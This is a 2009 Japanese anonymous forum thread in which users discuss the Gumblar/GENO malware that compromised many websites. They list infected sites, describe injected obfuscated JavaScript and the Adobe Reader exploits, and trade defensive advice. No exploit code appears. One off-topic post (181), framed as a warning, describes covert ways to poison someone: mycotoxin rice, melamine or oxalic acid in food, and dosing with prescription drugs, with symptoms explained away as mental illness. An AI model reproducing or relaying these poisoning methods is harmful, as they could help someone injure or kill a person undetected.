147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 17:01:55 ]: GENOって店、いまはもう大丈夫なの？
148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 17:05:39 ]: >>147
それはあなた次第です！
149 名前：名無しさん＠お腹いっぱい。 [2009/05/06(水) 17:50:46 ]: 　
【社会】アドビ(Adobe)製品のセキュリティ問題に苦しめられる企業
　
tsushima.2ch.net/test/read.cgi/newsplus/1241598327/
150 名前：名無しさん＠お腹いっぱい。 [2009/05/06(水) 20:45:13 ]: Adobe滅ぶべし
tsushima.2ch.net/test/read.cgi/news/1241598738/
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 20:51:44 ]: やっとOS再インスコしてきたよ
もうGENOは開かない
キャッシュ削除で証拠隠滅しようとしたことは絶対に忘れない
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 23:44:45 ]: >>150
>>149と違いあるのかと思ったらモット低俗かよ
ν即民雑魚すぎ、だから（ｒｙ
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 00:17:51 ]: >>148
あそこは元からアウトだろｗｗｗ
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 06:33:14 ]: >>151
オレもろくな対応をしなく誠実さの欠片もないホビコンのサイトは二度と覗かない
昨日開催のイベントで謝罪広告が一切無しなのは許せない
忙しくてOS再インスコするまで2週間もパソコン使えず迷惑した
155 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 08:09:17 ]: >>154
ホビコンでも２回くらい同じような書き込みしてただろｗ
今あそこは疥癬があれこれかえてウレチーって言ってるだけのアホスレになってるから
書き込むだけアホらしいよ。
運営がどうしようもないのはディーラーならよく分かってるからＷＦとトレフェスで頑張れ。
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 15:45:38 ]: Firefox用アドオンのLinkExtendってよいな。
Dr.Webプラグインはほとんどのサイトでクリーンって言われてしまうけど、
Google、Norton、McAfee等の評価を利用できる。
カスペあたりを入れておいて、ヤバ気なサイトはLinkExtendでチェックすれば
かなり安全な気がする。
https://addons.mozilla.org/ja/firefox/addon/10777
www.linkextend.com/
157 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 17:44:37 ]: >>156
AVGとの組み合わせだと、どうでしょうか？
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 17:57:55 ]: >>157
知らね。
入れてみればいいんじゃない？
機能も細かく個別に切ったりもできるし。
万が一他のプラグインとの食い合わせが悪かったら捨てちゃえばいいだけでしょ。
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 19:43:58 ]: www.beauty-wed.co.jp
なぜかここはgumblarがalertになってる。注入失敗?
160 名前：名無しさん＠お腹いっぱい。 [2009/05/07(木) 20:45:01 ]: 【重要】掲載広告における遷移先ページのウイルス感染について　[2009/05/07]
ttp://www.heso-click.com/info/index.asp?info_code=264

>□対象の広告
>　競馬情報会社　ホースマンクラブ

>ホースマンクラブ様のサイトを閲覧されますと、「gumblar.cn」という
>ドメインからスクリプトがダウンロードされ、その後別のファイルをダウンロードして
>不正な処理が実行されるようです。
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 21:12:09 ]: >>160
その広告が掲載されてるポイントサイトにメールした。
今日になって広告が消されていたのが３サイト。
（へそクリック　そんなバナナ　preco）

そのままなのが２サイト。
（つぼマイル　おこづかい生活）
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 23:40:40 ]: ホースマンクラブっての自体は今でもヤバいの？
aguseで調べても問題が検出されないんだよな。
生で踏む勇気はないｗ
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 23:47:53 ]: 1時間くらい前に見に行ったら直ってたっぽい。
ちなみにその前はAVASTがガンガン反応してた。
サイト管理者のPCが直ってるかは不明ｗ
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/07(木) 23:53:58 ]: >>163
さんきゅ。
>>156のプラグインが役に立つのかどうか未だにわからん。
165 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 04:25:03 ]: 156入れたら技術系サイトが表示されなくなった
無理やりjavascriptで書き換えてバグるっぽ
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 04:57:43 ]: >>165
例えばどこあたり？
@ITなんかは普通に表示できてるけど。
167 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 18:47:45 ]: ビッグ3破綻とインフルエンザですっかり影をひそめちまったな
もっと頑張らないと忘れられちまうな
168 名前：名無しさん＠お腹いっぱい。 [2009/05/08(金) 19:03:37 ]: おーい
今さっきＧＥＮＯからメールきたんだけど
もうwebサイトの方はういるしゅ抜きに戻ったの？

店舗に行くか・・・というかそこで買うのもなんか嫌だから
似たような店教えてくれ←感染しないとこおねがいｗ
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 19:28:34 ]: >>168
> もうwebサイトの方はういるしゅ抜きに戻ったの？

今のところは大丈夫なのかもね。
どんな対策を取ったのかまったくわからないから、パワーアップした
新種のGenoウィルスを食らう覚悟が必要だなｗ
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 20:10:00 ]: 数日おきに入れ代わってるからな、GENOウイルス本体は。
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 21:40:11 ]: 2chのサーバー会社にウイルス
tsushima.2ch.net/test/read.cgi/news/1241785943/
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 21:56:20 ]: じわじわ感染が広がってるな
GENOの最初の対処がまずかったのも一因か
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 22:51:30 ]: maidなんとかってのは踏んだことはないが、2ch見てたら自動的に踏んでるってこと？
もう勘弁してくれよ・・そういうのわかんないんだよ・・・
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 23:06:36 ]: >>173
専ブラ使ってないの？
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 23:08:44 ]: ヌーブラ愛用してます
176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 23:29:32 ]: >>169,170
ほんとかよ・・・何が原因かわかってないのね
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/08(金) 23:30:10 ]: 専ブラ使ってる。
使ってたら大丈夫？
178 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 00:11:55 ]: >>173
2chのトップ(www.２ch.net)とちがくね？
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 01:03:11 ]: >>177
問題ないと思う
180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 01:08:59 ]: >>178
>>179
ありがとう。
181 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 01:57:30 ]: 汚染米とラジコン
gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
www.tk-telefilm.co.jp/gaslight.html
　　夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
　　精神的に追詰められる心理サスペンスの傑作！　　
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
　ガスライティング----で検索　ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 08:05:36 ]: ここ反応するんだけどどう？
ttp://www.freaksstore.com/
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 08:35:12 ]: EXQAUTOのウェブサイトもやられたね。
連休中は死亡状態だったが、今は復旧している模様。
但し、感染にかんするコメントは出されていない。
（闇に葬った可能性大！）

5月6日までにアクセスした人はクリーンインストールよろ。
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 08:51:08 ]: マジで被害広がってるじゃん。
世間じゃ全く話題にならないけど…
185 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 09:16:49 ]: >>182
www.freaksstore.com のウェブサイトに含まれている gumblar.cn のサイトの要素に、
コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性が
あります。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する
場合があります。
186 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 09:33:15 ]: >>184
まぁいいんじゃね？
そのうち職場のやつらが騒ぎ出したら笑いこらえるのがタイヘン
187 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 09:40:24 ]: >>182
難読化されたJSコードが挿入されている。
UAを調べてVista未満のWindowsだとgumblar.cnに飛ばす。
188 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 09:46:38 ]: Genoウィルス怖いねー
189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 09:54:42 ]: >>182
何で反応したの？
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:18:36 ]: AVG
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:18:46 ]: >>189
pc11.2ch.net/test/read.cgi/sec/1235459712/

（>>189はもしかして↓の ID:kiwZ4rzt だったりして？）
（tsushima.2ch.net/test/read.cgi/news/1241785943/50-52）
192 名前：189 mailto:sage [2009/05/09(土) 10:24:19 ]: >>191
そのIDの人とは、別人です。GENOも最初見つかったときは、対応しているセキュリティ
ソフト少なかったから未知のウィルスの対応ってどうすれば、いいのかな？って思って質問
したのです。さっきのリンク先は、URLチェッカーだと安全って表示されてたしね
193 名前：189 mailto:sage [2009/05/09(土) 10:26:13 ]: リンク先飛んだんだが、javaきってるからAVGが反応してくれるのか分かんないよ・・・
194 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:35:15 ]: gumblar.cnはgeno以上に活動してるな
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:41:21 ]: >>187
アドレス変わったのか

zlkonは途中で経路切られて終了かと思ったのに
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:43:03 ]: >>182,>>193
Avast以外はスルー。

ttp://www.virustotal.com/analisis/2febff2a5a33a9c9564e247f658cb97d (2/40)
197 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 10:49:30 ]: ここも参考になります
ttp://ilion.blog47.fc2.com/blog-entry-128.html
198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 10:50:36 ]: >>194
どうしてもガンダムに見えるんだよなぁ
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 11:05:39 ]: なぁなぁ、感染してるっぽいサイトをGoogleで検索しただけでavast先生が警告するんだが
これってどうなってるの？
ひょっとして対策してなかったらググっただけで即感染するのか？

例）「村民」で検索したら一番最初に出てくる村民バスのうんたら～ってサイトが感染してる
らしくavast先生が反応する。
※当然だけど試すなら対策してからやってくれ
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 11:30:38 ]: >>199
これも>>182と同じだな。難読化のやり方は違うけど処理はまったく同じ。
avastがどう判断してるのかわからないけど、
ググっただけで感染するのはGoogleが改竄されたときだけ。
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 12:10:18 ]: >>199やっかいだな
対応していないアンチウイルスソフトが多すぎる
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 12:16:02 ]: Adobe ReaderとFlash Playerを最新版にして、Javascriptを無効にしてても
感染しちゃうのでしょうか？
203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 13:12:50 ]: 散布元がこれだけファイルをコロコロ変えてくるとシグネチャ定義では対応できません。
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 14:23:41 ]: >>202
感染します。
感染後の、AdobeReaderを利用した動作部分のみ行なえないだけで、他の動作はするでしょうね。
常駐してftpサイト更新を検知したら～とか。コマンドプロンプト出そうとしたら起動できないとか。

ほぼ日替わりで本体が入れ代わってるので、その日に、どんなものが落ちてきて実行されるかなんて
わかりません。業者の方が撤退しない限りは、PG2などで、gumblar.cn の範囲をブロックするのが有効です。
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 14:44:46 ]: Javascript無効なら感染しないんじゃないの？
206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 15:23:05 ]: >>202の条件なら、しねぇだろ
207 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 15:36:15 ]: お気に入りの通販サイトなんかあったらjavascript有効にするだろうから
普通のサイトが突如ウイルス拡散することになるのは恐怖だな。
208 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 16:25:44 ]: さっきPDF開くようなサイトじゃないのにAdobe ReaderがJavaScriptがONじゃないと表示されないよと
警告してきた。Adobe Reader9のJavaScriptは切ってる。これはもしや引掛ったか？
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 16:27:43 ]: >>199
感染するかは分からないけど、先読み無効に出来るみたい。

ttp://www.google.com/help/features.html

リンク先読み機能 - プリフェッチ

一部の Google 検索については、ユーザーがクリックする前に最上位の検索結果のダウンロードを開始しています。
そのため、最上位の結果をクリックすると、リンク先ページが高速で読み込まれます。

この特殊なプリフェッチ機能は Firefox および Mozilla ウェブブラウザだけで、Internet Explorer などの他のブラウザではご利用いただけません。
Mozilla のプリフェッチ FAQ に記載されているとおり、プリフェッチ機能はウェブブラウザの設定で無効にできます。
Firefox でプリフェッチを無効ににする方法:

アドレスバーに「about:config」と入力します。
「network.prefetch-next」の設定まで下にスクロールし、値を「False」に設定します。
210 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 16:34:11 ]: >>208
リンクされない程度に削ってURLうｐおね
211 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 16:39:21 ]: >>210
h++p://cmd-pro.com/m_com.html
212 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 16:48:59 ]: >>209
先読みが静的データとしてバックグラウンドで読んでるならいいのだが、違ったら感染するな
213 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 17:44:21 ]: >>211
gumblar.cnだな。
あと、そこと同じようなレイアウトのサイトが他にもいくつかあるんだが、
もし管理者が同じ人物なんだとするとftp経由で軒並み改竄されるかもしれない。
ちょっと確認したところでは
www■wa-purokentei■com
は改竄済み。
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 17:50:49 ]: >>208
Adobe側のScriptをオフにしといたんだろ?
メッセージを鵜呑みにしてオンにしなきゃセーフ
215 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 17:51:38 ]: >>213
了解した。サイト管理者に通告すべきだな。
あと、acroreadのJavaScript切ってたら大丈夫だろうか…
今a-squaredでスキャン中なのだが。
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 17:53:50 ]: >>214
ONにはしなかった。一応だけど調査継続しておく。
217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 20:00:26 ]: >>216
切ったままでオンにしなきゃ大丈夫。
その状態でわざと踏んで検体拾って送ったりしてるんで。
218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 20:33:41 ]: >>217
だが結局はAdobeだ。死ぬなよ。
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 20:52:47 ]: >>218
今のところ平気。

ちなみにFoxit用のコードも実戦投入されているので
FoxitもScript切らないとだめくさ(設定箇所は同じ)。
220 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 21:09:28 ]: >>212
それはまずい
けど、そんなに問題ならもっと以前から騒がれてる気がするけど
結構昔からついてる機能みたいだし
221 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 21:28:47 ]: これに感染したっぽくてバックアップデータを取って
ＯＳを再インストールしたいんだけど
インスコし直したＰＣにバックアップデータを入れても
ウイルスってついてこないのかな？
こういった感染例ってありますか？
新ＯＳでスキャンして反応なかったら大丈夫なのかな
222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 22:14:10 ]: 管理してるサイトに置いてあったPHPに例の一行目と、HTMLにjsが追加されてるのを発見
クライアントPCは感染していないのを確認
実は数日前、レンタルサーバー屋さんに速度がらみでのなにかしらの処理をしてもらった
のだが、これが原因ということはありますかね？
サーバー屋さんが感染してるとか…
223 名前：名無しさん＠お腹いっぱい。 [2009/05/09(土) 22:23:19 ]: >>199
>>209
ｺﾜｰｲ
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 22:28:35 ]: >>221
単純にそれだけ聞く分にはまだダメじゃないか？

・FTP他のパスワードを新環境側から変更する
・手持ちのHTML系データは手作業で感染チェックする
・バックアップソフトで一括バックアップはしない
・アンチウィルスが全て対策してるわけではないので、信用しすぎない

HTMLの手動チェックは辛いところだが、他は最低限気にすべきかと思う
225 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 22:40:49 ]: >>189
ttp://www.virustotal.com/jp/analisis/7ee6d2d0e533eb6536236075c84c9482
これだろ
226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/09(土) 23:59:43 ]: これだけ感染が拡大してるのに世間の盛り上がらなさは異常。
227 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 00:25:03 ]: 正規サイト改ざん：国交省、全日本民医連、NHT紀尾井町グループ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1876

以前の薬事日報といい、医療関係を軸に広がりを見せてる？？
紀尾井町のも自毛植毛だから整形外科で医療扱いだし
岐阜はワカラン
228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 00:29:46 ]: >>222
どうだろうね。
ftpのパスを抜かれて改竄されるみたいなんで
鯖屋さんがftp経由で更新してたらその可能性もあるかも。

あとクライアントPCが感染してないと判断した根拠が何なのかってのも問題になる。
この種類の攻撃だとdropperも本体もサーバ側で入れ替えし放題なので、
アンチウィルスで検出できないだけでクライアントPCが実は感染してましたってことも考えられる。
229 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 01:59:35 ]: >>227
全体的に広がってるけどちゃんと対応するのが医療関係だけで
ほかはもみ消したり気づいてなかったりするかんじ
230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 02:25:26 ]: GENOとしては「うちだけじゃないからｗ」ってことで一安心だろう。
231 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 06:36:56 ]: gumblar.cn踏んだ後にUDP52468で色んな所からアタック来ない？
232 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 08:46:58 ]: >>230
糞みたいな対応したのは数少ないけどねたぶんｗ
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 09:16:11 ]: GENOから感染したってのが多いだろ
234 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 09:29:00 ]: 5月1日時点のGENOウイルス感染数（初期GENOウイルス）

日本　13,024件

････････････・・・・・・・・・・・・・・・。
235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 11:38:32 ]: なあ、このウイルスってもうYahooのトップで警告しなきゃならないくらいのレベルだよな？
削除があまりにも難しく、しかも亜種が続々。

なんでダンマリなの？
236 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 11:44:11 ]: 詳細が不明だから
237 名前：名無しさん＠お腹いっぱい。 [2009/05/10(日) 21:49:23 ]: 照英のサイト改竄は芸能人だし、これをきっかけに
ニュースにもでもなるかと思ったけど静かなもんだね
238 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 23:50:03 ]: IPAすらGENOウイルス自体を知っているとも思えないが。
239 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 23:51:15 ]: IPAは身内が感染しちゃうぐらいだしなぁw
240 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 23:52:18 ]: >>124
>>127

必死
241 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/10(日) 23:54:23 ]: 誤爆か
242 名前：名無しさん＠お腹いっぱい。 [2009/05/11(月) 02:27:01 ]: PC通販ショップ「GENO」が不正アクセスで不具合　今回のトラブルについてのお詫び
gimpo.2ch.net/test/read.cgi/owabiplus/1239264401/l50

【客の返品】GENOを語るスレ29【オク出品】
pc11.2ch.net/test/read.cgi/pc/1237696091/l50

【ｳｲﾙｽ感染】GENOを語るスレ30【ｱｸｾｽ注意】
pc11.2ch.net/test/read.cgi/pc/1239004304/l50

【新種ｳｲﾙｽ】GENOを語るスレ31【無料配布中】
pc11.2ch.net/test/read.cgi/pc/1239197673/l50

【ｳｲﾙｽ】GENOを語るスレ31【完治】
pc11.2ch.net/test/read.cgi/pc/1239199378/l50

【ｳｲﾙｽ被害】GENOを語るスレ32【謝罪なし】
pc11.2ch.net/test/read.cgi/pc/1241248612/l50
243 名前：名無しさん＠お腹いっぱい。 [2009/05/11(月) 02:28:38 ]: 【顧客相手に】GENOを語るスレ24【ｻｲﾊﾞｰｼﾞｪﾉｻｲﾄﾞ】
pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50

【8BOAA】 GENOを語るスレ26 【zif付き】
pc11.2ch.net/test/read.cgi/notepc/1232024693/l50

★090406 複数板｢ウイルスGeno短縮URL｣誘導マルチポスト荒らし報告
qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50

【緊急警報】GENOなどのサイトでウイルス感染（２ちゃんに貼られた不明なリンクへも飛ぶべからず！！）
pc11.2ch.net/test/read.cgi/pcnews/1239034325/l50
244 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/11(月) 17:21:12 ]: IPAにso-netのセキュリティ通信が上手く纏まってるので見ろと
役立たずのIPAは解散しろと言っておきました

これで少なくとも把握してないと言う事にはならないでしょう
245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/11(月) 19:01:35 ]: gumblarをブログに書いたら
その記事にLACからアクセスあったので
知らないとは言わせない(´・ω・)ｽ

# あとはJPCERTか?
246 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/11(月) 20:28:13 ]: 結構、企業からも個人がアクセスしているだろうから、そのうちとんでもないことに
247 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/11(月) 21:14:15 ]: >>244
so-netのセキュリティ通信便利だよね、よくまとまってるし
一般人にもすすめ易い
必ずしも速報性はないけど大手にしては上出来
アンテナとしてキュリティホールmemo見てるけど、他の人にはすすめにくいからなあ
他に一般人向けでそこそこ情報補足が早いとこ知ってる人いる？
248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/11(月) 21:31:37 ]: テレビやラジオで少しの時間で良いからインターネットのセキュリティに関するニュースを毎日流して欲しいと思っています。
249 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 00:22:29 ]: >>247
一連の記事、なんか違和感があると思ったら、「Adobe」が軒並み[Adbe」に
なってるんだな。
250 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 00:41:18 ]: >>249
ほんとだｗ
対策方法の情報ページのはじめの３つだけAdbeになってる
教えてあげたら寸志もらえるかな？ｗ
251 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 00:52:03 ]: 「ご指摘ありがとうございました」の返信だけだろ
252 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:03:54 ]: これって検出するのはどうしたらいいの？
253 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:10:13 ]: >>252
感染の可能性を低くする方法はあるが、検出できるかどうかは運次第。
どんどん新型に置き換わってるから、アンチウィルスもシグネチャベースの対応は
追いついていない。
254 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:26:41 ]: じゃあおまえらは
どうやって気付いたの？
255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:32:53 ]: >>254
Chromeが遮断してくれた。運がよかった。
256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:49:29 ]: >>254
いつものようにGENOのサイトをひやかしにいったら、なんか重くてブラウザハングしたから
同じ様な奴を捜しに２ちゃんでスレ探して、ウィルス感染に気づいてクリーンインストールｗ
257 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 01:52:41 ]: どんどん新型でてるなあ
258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 02:04:38 ]: それで結局、
どうやったら検出できるんだよ？？
259 名前：名無しさん＠お腹いっぱい。 [2009/05/12(火) 02:07:03 ]: あはは
260 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 02:51:13 ]: これって
AdobeReader7.1.1 と
FlashPlayerを最新にすると感染しないの？
261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 02:53:54 ]: >>260
sourceforge.jp/developer/diary.php?diary_id=3950&diary_user=38633
262 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 02:55:13 ]: >>260
sourceforge.jp/developer/diary.php?diary_id=3949&diary_user=38633
263 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 03:22:27 ]: ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
（7.1.1以前）と書いてあるが・・?
264 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 03:33:34 ]: この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン（7.1.1以前）に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている
265 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 04:10:56 ]: 最近落ち着いてるがいつ暴れだすか分からないからスレが閉じれない
まるでインフルエンザだウィルス繋がりでも
266 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 11:34:08 ]: >>171もGENOっぽいけどserver.maido3.comは鯖が違うからセーフ？
267 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 11:38:03 ]: adobeの対策版予定は今日だったな
時差の関係で夕方くらいかな?
268 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 12:06:39 ]: H1N1よりもこっちのほうがpandemicになってるのに
マスコミは全く取り上げないな
269 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 12:32:28 ]: 都合の悪いことは先が見えるまで後回しが基本だからな
270 名前：名無しさん＠お腹いっぱい。 [2009/05/12(火) 12:48:45 ]: 今日は月例UPdateだね
271 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 13:20:05 ]: PowerPointしかないからどうでもいいけどな
それよりAdobe仕事しろ
272 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 13:35:13 ]: Microsoftセキュリティ対策センター（MSRC）のブログによれば、
今回はOffice関連のアップデートとなるため、Windows Update経由では
配布せず、Microsoft Updateサービスを通じての提供となる。

　セキュリティ情報と併せて、悪意のあるソフトウェアの削除ツール
更新版と、セキュリティ以外のアップデートもリリース予定だ。
273 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 18:40:01 ]: Windows７登場は年末にずれ込んだんですね

年末には何が起きるんでしょうかww
274 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 19:09:05 ]: Windows7発売
豚インフルが変異し強毒性を得て大流行
世界的大恐慌
来年には世界的戦争状態に
もうﾒｼｳﾏで今からおしっこ漏れそうです
275 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 22:15:29 ]: >>248
GENOみたいに対応を全くしないで放置してる情報が流れたらえらい事になりますｗ
短縮URLテロどころじゃないですよ
276 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 22:54:19 ]: >>275
情報なしで、２ちゃんで感染サイトを貼り付けられまくると
感染者増えるじゃね？
